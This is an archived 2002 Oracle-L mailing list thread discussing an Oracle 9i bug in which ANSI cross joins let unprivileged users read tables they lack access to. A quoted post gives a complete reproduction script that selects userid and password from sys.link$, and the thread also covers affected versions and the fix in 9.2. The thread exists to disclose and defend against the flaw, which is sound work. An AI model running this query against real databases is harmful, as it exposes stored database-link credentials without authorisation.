Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Mailing Lists -> Oracle-L -> RE: Security Hole

RE: Security Hole

From: Hately Mike <Mike.Hately_at_churchill.com>
Date: Tue, 16 Apr 2002 08:33:39 -0800
Message-ID: <F001.0044576A.20020416083339@fatcity.com> 





Yeah, I got all of the emails in the wrong order so I saw the bug after I
saw the replies. Consequently I made an idiot of myself.



Still, the sun's shining so it could be worse. =)



Regards (and apologies for wasting the electrons),
Mike



-----Original Message-----


Sent: Tuesday, April 16, 2002 5:19 PM


To: Multiple recipients of list ORACLE-L




No , the user did not have access to link$.  But that's the point.  The bug
allows the user access to table he/she doesn't have access to when used with
a cross join.



> -----Original Message-----

> From: Hately Mike [mailto:Mike.Hately_at_churchill.com]

> Sent: Tuesday, April 16, 2002 11:39 AM

> To: Multiple recipients of list ORACLE-L

> Subject: RE: Security Hole

> 

> 

> Glenn, 

> did the user have access to LINK$. It's common practice to 

> restrict access

> to that table.

> 

> Cheers,

> Mike

> 

> -----Original Message-----

> Sent: Tuesday, April 16, 2002 3:39 PM

> To: Multiple recipients of list ORACLE-L

> 

> 

> It appeared in 9i and is fixed in 9.2.

> 8i is not affected as it does not have cross joins.  

> 

> From Metalink Note 137286.1;

> 

> Oracle9i introduces the following SQL:1999-compliant joins:

> 

>     1.1 CROSS Join

>     1.2 NATURAL Join

>     1.3 OUTER Join

>     1.3.1 LEFT OUTER Join

>     1.3.2 RIGHT OUTER Join

>     1.3.3 FULL OUTER Join

> 

> 

> 1.1 CROSS Join

> --------------

> 

> A CROSS join is the cross-product of two tables. It is the 

> equivalent of a

> Cartesian product.

> -----------------------

> 

> I tried the query with a cartesian product in 8i and it didn't work.

> 

> select userid,password from sys.link$, dual

>                                 *

> ERROR at line 1:

> ORA-00942: table or view does not exist

> 

> 

> > -----Original Message-----

> > From: Ruth Gramolini [mailto:rgramolini_at_tax.state.vt.us]

> > Sent: Tuesday, April 16, 2002 8:38 AM

> > To: Multiple recipients of list ORACLE-L

> > Subject: Re: Security Hole

> > 

> > 

> > Is this on 9i databases or is 8 involved?  Ruth

> > ----- Original Message ----- 

> > To: "Multiple recipients of list ORACLE-L" <ORACLE-L_at_fatcity.com>

> > Sent: Tuesday, April 16, 2002 7:33 AM

> > 

> > 

> > > This just in from comp.databases.oracle.server.

> > > 

> > > See metalink bug 2121935.

> > > 

> > > Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc)

> > > allows you to view data from tables on which you have no

> > > privilege.  For example, try this COMPLETE script:

> > > 

> > > connect / as sysdba

> > > create user us1 identified by us1;

> > > grant create session to us1;

> > > 

> > > connect us1/us1

> > > 

> > > select userid, password

> > > from

> > >         sys.link$ cross join dual

> > > ;

> > > 

> > > 

> > > 

> > > Worse still, if you have the privilege to create views

> > > then this loophole allows you to seek and destroy 

> > > ANY DATA in the database that you might want to.

> > > 

> > > The bug is fixed in 9iR2.  I didn't see any note 

> > > about a backport, or a security alert on OTN.

> > > 

> > > Conclusion:

> > > 

> > >     9.0.1 should not be in use on production system

> > >     until Oracle supplies a fix.

> > > 

> > > 

> > > 

> > > Jonathan Lewis

> > > http://www.jlcomp.demon.co.uk

> > > 

> > > Author of:

> > > Practical Oracle 8i: Building Efficient Databases

> > > 

> > > Next Seminar - Australia - July/August

> > > http://www.jlcomp.demon.co.uk/seminar.html

> > > 

> > > Host to The Co-Operative Oracle Users' FAQ

> > > http://www.jlcomp.demon.co.uk/faq/ind_faq.html

> > > 

> > > 

> > > 

> > > 

> > > -- 

> > > Please see the official ORACLE-L FAQ: http://www.orafaq.com

> > > -- 

> > > Author: Jonathan Lewis

> > >   INET: jonathan_at_jlcomp.demon.co.uk

> > > 

> > > Fat City Network Services    -- (858) 538-5051  FAX: 

> (858) 538-5051

> > > San Diego, California        -- Public Internet access / 

> > Mailing Lists

> > > 

> --------------------------------------------------------------------

> > > To REMOVE yourself from this mailing list, send an E-Mail message

> > > to: ListGuru_at_fatcity.com (note EXACT spelling of 

> 'ListGuru') and in

> > > the message BODY, include a line containing: UNSUB ORACLE-L

> > > (or the name of mailing list you want to be removed 

> from).  You may

> > > also send the HELP command for other information (like 

> subscribing).

> > 

> > -- 

> > Please see the official ORACLE-L FAQ: http://www.orafaq.com

> > -- 

> > Author: Ruth Gramolini

> >   INET: rgramolini_at_tax.state.vt.us

> > 

> > Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051

> > San Diego, California        -- Public Internet access / 

> Mailing Lists

> > --------------------------------------------------------------------

> > To REMOVE yourself from this mailing list, send an E-Mail message

> > to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in

> > the message BODY, include a line containing: UNSUB ORACLE-L

> > (or the name of mailing list you want to be removed from).  You may

> > also send the HELP command for other information (like subscribing).

> > 

> -- 

> Please see the official ORACLE-L FAQ: http://www.orafaq.com

> -- 

> Author: Glenn Travis

>   INET: Glenn.Travis_at_sas.com

> 

> Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051

> San Diego, California        -- Public Internet access / Mailing Lists

> --------------------------------------------------------------------

> To REMOVE yourself from this mailing list, send an E-Mail message

> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in

> the message BODY, include a line containing: UNSUB ORACLE-L

> (or the name of mailing list you want to be removed from).  You may

> also send the HELP command for other information (like subscribing).

> 

> 

>  

> ______________________________________________________________

> ______________

> ________________________ 

> 

> This email and any attached to it are confidential and 

> intended only for the

> individual or 

> entity to which it is addressed.  If you are not the intended 

> recipient,

> please let us know 

> by telephoning or emailing the sender.  You should also 

> delete the email and

> any attachment 

> from your systems and should not copy the email or any attachment or

> disclose their content 

> to any other person or entity.  The views expressed here are 

> not necessarily

> those of 

> Churchill Insurance Group plc or its affiliates or 

> subsidiaries. Thank you. 

> Churchill Insurance Group plc.  Company Registration Number - 2280426.

> England. 

> Registered Office: Churchill Court, Westmoreland Road, 

> Bromley, Kent BR1

> 1DP. 

> 

> 

> -- 

> Please see the official ORACLE-L FAQ: http://www.orafaq.com

> -- 

> Author: Hately Mike

>   INET: Mike.Hately_at_churchill.com

> 

> Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051

> San Diego, California        -- Public Internet access / Mailing Lists

> --------------------------------------------------------------------

> To REMOVE yourself from this mailing list, send an E-Mail message

> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in

> the message BODY, include a line containing: UNSUB ORACLE-L

> (or the name of mailing list you want to be removed from).  You may

> also send the HELP command for other information (like subscribing).

> 


-- 
Please see the official ORACLE-L FAQ: http://www.orafaq.com
-- 
Author: Glenn Travis
  INET: Glenn.Travis_at_sas.com

Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
--------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message
to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
the message BODY, include a line containing: UNSUB ORACLE-L
(or the name of mailing list you want to be removed from).  You may
also send the HELP command for other information (like subscribing).


 
____________________________________________________________________________
________________________ 

This email and any attached to it are confidential and intended only for the
individual or 
entity to which it is addressed.  If you are not the intended recipient,
please let us know 
by telephoning or emailing the sender.  You should also delete the email and
any attachment 
from your systems and should not copy the email or any attachment or
disclose their content 
to any other person or entity.  The views expressed here are not necessarily
those of 
Churchill Insurance Group plc or its affiliates or subsidiaries. Thank you. 
Churchill Insurance Group plc.  Company Registration Number - 2280426.
England. 
Registered Office: Churchill Court, Westmoreland Road, Bromley, Kent BR1
1DP. 


-- 
Please see the official ORACLE-L FAQ: http://www.orafaq.com
-- 
Author: Hately Mike
  INET: Mike.Hately_at_churchill.com

Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
--------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message
to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
the message BODY, include a line containing: UNSUB ORACLE-L
(or the name of mailing list you want to be removed from).  You may
also send the HELP command for other information (like subscribing).


Received on Tue Apr 16 2002 - 11:33:39 CDT












Original text of this message













  HOME |
  ASK QUESTION |
  ADD INFO |
  SEARCH |
  E-MAIL US